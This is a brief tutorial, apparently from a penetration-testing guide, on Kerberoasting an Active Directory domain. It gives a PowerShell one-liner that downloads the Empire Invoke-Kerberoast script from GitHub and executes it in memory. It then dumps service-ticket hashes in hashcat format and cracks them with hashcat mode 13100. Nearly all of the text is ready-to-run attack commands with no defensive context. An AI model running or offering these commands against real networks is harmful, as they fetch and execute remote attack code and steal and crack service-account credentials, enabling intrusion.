Installing Invoke-Kerberoast script
Lets first get the Powershell Invoke-Kerberoast script.
iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -OutputFormat hashcat |fl
You should get a SPN ticket.
Cracking Hash using Hashcat
hashcat -m 13100 -​a 0 hash.txt wordlist --force